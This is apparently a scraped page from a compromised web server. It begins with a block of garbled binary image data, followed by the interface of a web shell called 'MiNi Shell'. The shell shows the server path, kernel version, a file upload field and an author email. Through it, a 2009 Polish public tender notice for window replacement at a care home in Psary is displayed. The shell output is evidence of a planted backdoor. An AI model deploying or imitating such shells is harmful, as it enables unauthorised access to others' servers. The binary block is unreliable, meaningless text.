JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090421/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090421/114570-N-2009.html

<p class="kh_header"><b>Sieroszewice: Modernizację obiektów Domu Pomocy Społecznej w Psarach 
w zakresie dostosowywania budynków do wymaganych standardów 
- Budynek Pałacu wymiana okien</b><br>
<b>Numer ogłoszenia: 114570 - 2009; data zamieszczenia: 21.04.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Dom Pomocy Społecznej w Psarach , Psary, ul. Kaliska 3, 63-405 Sieroszewice, woj. wielkopolskie, tel. 062 7396084, 7396315, faks 062 7396084, 7396315.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Modernizację obiektów Domu Pomocy Społecznej w Psarach 
w zakresie dostosowywania budynków do wymaganych standardów 
- Budynek Pałacu wymiana okien.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	 Przedmiotem  zamówienia jest wymiana 53 okien w budynku Pałacu.
2.	 Zamówienie dotyczy wykonania i wymiany okien, podokienników oraz dostawy i montażu nawiewników.
Wykonawca winien przedstawić wzór (przekrój) ramy okna wraz z mocowaniem szyb i mocowaniem okucia - podać producenta okuć. Wzór winien być zaakceptowany przez Inspektora Nadzoru oraz przez Konserwatora zabytków. Przewiduje się indywidualne przygotowanie okien i drzwi po wcześniejszym wykonaniu obmiarów otworów. Załączone zestawienie stolarki należy traktować jako pomocnicze w celu określenia zakresu i ceny robót. Okna i drzwi należy wykonać z drewna klejonego, suszonego i impregnowanego komorowo. Należy zastosować słupki i belki wg podanego profilu. ramy skrzydeł przystosowane do szklenia szybami zespolonymi. W oknach należy zastosować okucia obwiedniowe zapewniające rozwieranie skrzydeł oraz ich uchylność (blokowaną). Okna winny być przystosowane do montażu klamek z zabezpieczeniem patentem, lub klamką wyjmowaną . Wyznaczenia okien specjalnie zabezpieczonych dokona indywidualnie Inwestor. W oknach stosować słupki i poprzeczki stałe, w taki sposób aby zapewnić podział okien na nie więcej niż 4 skrzydła. Szprosy w formie wąskich listew osadzone w ramach ruchomych. Nie należy stosować atrap szprosów wewnątrz zestawów szybowych. zastosować zestawy dwuszynowe o współczynniku przenikania nie gorszym niż 1,1 W/m2K. Wewnętrzna powłoka selektywna na przynajmniej jednej szybie. Uszczelki EPDM. Parapety wewnętrzne wykonać drewniane z identycznego materiału jak okna. Parapety                  w Łazienkach z płytek. Elementy skrzydeł, słupków i poprzeczek wykończyć przez frezowanie krawędzi i wyżłobienia w słupkach. Wszystkie okna od zewnątrz należy malować na biało. Producent winien udzielić minimum 5-cio letniej gwarancji na powłoki malarskie. malowanie wewnętrzne na biało lub lakierem koloryzującym w zależności od wymagań Inwestora w poszczególnych pomieszczeniach.
3.       Szczegółowy opis przedmiotu zamówienia  stanowią: dokumentacja projektowa, przedmiary robót oraz specyfikacja techniczna wykonania i odbioru  robót  stanowiące załączniki w formie plików pdf

UWAGA!!! Pomimo, iż w specyfikacji technicznej jest mowa o wymianie drzwi przedmiotem zamówienia jest tylko wymiana okien zaznaczonych na rysunkach stanowiących załącznik do siwz..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7, 45.42.11.32-8.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 23.06.2009.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> 1. Oferta  musi zostać zabezpieczona wadium w wysokości: - 2.500,00 złotych
2. Termin wniesienia wadium upływa  dnia 13 maja  2009 roku do godz.12.00
3. Wadium może być wnoszone w jednej lub kilku następujących formach:
a) pieniądzu
b) poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo - kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym;
c) gwarancjach bankowych;
d) gwarancjach ubezpieczeniowych;
e) poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt. 2 ustawy z dnia                9 listopada 2000 roku o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. Nr 109, poz. 1158 ze zmianami).
4. Wadium wnoszone  w pieniądzu wpłaca się przelewem na rachunek bankowy Zamawiającego.<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 1.  O udzielenie zamówienia ubiegać się mogą wykonawcy spełniający następujące warunki:
1.1. posiadają uprawnienia do wykonywania określonej działalności  lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień, 
1.2.  posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym i osobami zdolnymi do wykonania zamówienia lub przedstawią pisemne zobowiązanie innych podmiotów                  do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia;
1.3. znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia,
1.4 nie podlegają wykluczeniu z postępowania w myśl postanowień art. 24 ust. 1 i 2 ustawy                          z dnia 29 stycznia 2004 roku Prawo zamówień publicznych (j.t. Dz.U. Nr 223, poz.1655 z 2007 roku ze zmianami).</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 1. W celu potwierdzenia spełnienia warunków udziału w postępowaniu o udzielenie zamówienia publicznego w ofercie muszą zostać zawarte następujące oświadczenia, dokumenty i informacje: 
1.1.oświadczenie o spełnieniu warunków określonych w art. 22, ust. 1 ustawy z dnia 29 stycznia 2004 roku Prawo zamówień publicznych (j.t. Dz.U. Nr 223, poz.1655 z 2007 roku ze zmianami) - treść oświadczenia zawarta jest w załączniku Nr 1 do siwz - wypełnić Załącznik nr 1
1.2.na potwierdzenie spełnienia warunku, iż Wykonawca ubiegający się o udzielenie zamówienia posiada uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień: 
a)oryginał lub kserokopię aktualnego odpisu z właściwego rejestru albo aktualnego zaświadczenia o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawionego nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert
b) aktualnych zaświadczeń właściwego naczelnika urzędu skarbowego oraz właściwego udziału Zakładu Ubezpieczeń Społecznych lub kasy Rolniczego Ubezpieczenia Społecznego potwierdzających odpowiednio, że wykonawca nie zalega z opłaceniem podatków, opłat oraz składek na ubezpieczenie zdrowotne  i społeczne, lub zaświadczeń że uzyskał przewidziane prawem zwolnienie, odroczenie             lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawionych  nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków             o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert. 
WAŻNE ! W przypadku spółki cywilnej dokumenty wymienione w pkt. 2.2 a) - d)  muszą dotyczyć każdego ze wspólników
1.3. na potwierdzenie posiadania przez Wykonawcę niezbędnej wiedzy i doświadczenia oraz dysponowania potencjałem technicznym i osobami zdolnymi do wykonania zamówienia:
a) wykazu wykonanych robót budowlanych w okresie ostatnich pięciu lat przed dniem wszczęcia postępowania  o udzielenie zamówienia, a jeżeli okres działalności jest krótszy - w tym okresie, odpowiadających swoim rodzajem i wartością robotom budowlanym  stanowiącym przedmiot  zamówienia, z podaniem ich wartości oraz daty i miejsca wykonania  oraz załączeniem dokumentów potwierdzających, że roboty te zostały  wykonane należycie;- wypełniony Załącznik nr 2  - minimum 1 zadanie dot. wymiany okien w budynku zabytkowym
c) stwierdzających, że osoby, które  będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają  obowiązek posiadania  takich uprawnień. WAŻNE !   Wymagane jest aby robotami budowlanymi kierowała osoba  posiadająca odpowiednie uprawnienia budowlane do prowadzenia robót przy obiektach zabytkowych  oraz była członkiem Okręgowej Izby Inżynierów Budownictwa
1.4. na potwierdzenie, iż Wykonawca znajduje się w sytuacji  ekonomicznej i finansowej zapewniającej wykonanie zamówienia:
a)	polisy, a w przypadku jej braku innego dokumentu potwierdzającego, że Wykonawca jest ubezpieczony o odpowiedzialności cywilnej w zakresie prowadzonej  działalności.
1.5. potwierdzenie wniesienia wadium na rachunek bankowy Zamawiającego przed upływem terminu składania ofert.
- Dokumenty wymienione  w pkt. 2.2 - 2.5. muszą zostać złożone w formie oryginału lub kopii poświadczonej za zgodność z oryginałem przez Wykonawcę.
-  W przypadku gdy złożona przez Wykonawcę kopia dokumentu jest nieczytelna lub budzi wątpliwości co do jej prawdziwości, Zamawiający może żądać przedstawienia oryginału lub notarialnie  poświadczonej kopii dokumentu
2. Pozostałe dokumenty i oświadczenia, jakie  musi zawierać oferta:
a) wypełniony Formularz oferty - część II siwz
b) wzór (przekrój) ramy okien wraz z mocowaniem szyb i mocowaniem okuć
c)Zamawiający dopuszcza udział Podwykonawców  w realizacji zadania - propozycję  podzlecenia elementów robót   stanowi  wypełniony Załącznik  nr 3
d) podpisany i zaparafowany projekt umowy, - część III siwz
e)  kserokopia umowy spółki cywilnej jeżeli dotyczy,
f) oświadczenie, iż wszystkie materiały użyte do wykonania robót  objętych ofertą będą posiadły odpowiednie atesty i certyfikaty dopuszczające do stosowania  w budownictwie mieszkaniowym               oraz będą spełniać  odpowiednie wymagania norm - wypełniony Załącznik nr 4
g) oryginał pełnomocnictwa do  podpisania oferty -  pełnomocnictwo nie jest wymagane, jeżeli podpisujący jest  lub  podpisujący jest lub są właścicielami przedsiębiorstwa  lub jeżeli są oni wymienieni  z imienia i nazwiska  w odnośnym dokumencie rejestracyjnym.
h) oświadczenie, iż Wykonawca zobowiązuje się do wykonania tzw. okna poglądowego (przykładowego egzemplarza), który zostanie przedstawiony do zaopiniowania przez Wojewódzkiego Konserwatora Zabytków Delegatura z siedzibą w Kaliszu oraz wprowadzenia poprawek zgodnie z jego wytycznymi - oświadczenie stanowi wypełniony załącznik Nr 5 do siwz
i) kosztorys ofertowy. Kosztorys ofertowy należy sporządzić na drukach Zamawiającego, które stanowią załącznik do siwz.</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.powiat-ostrowski.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Dom Pomocy Społecznej 
w Psarach
ul. Kaliska 3
63 - 405 Sieroszewice
Budynek Pałacu - Biuro.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 13.05.2009 godzina 12:00, miejsce: Dom Pomocy Społecznej 
w Psarach
ul. Kaliska 3
63 - 405 Sieroszewice
Budynek Pałacu - Biuro.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com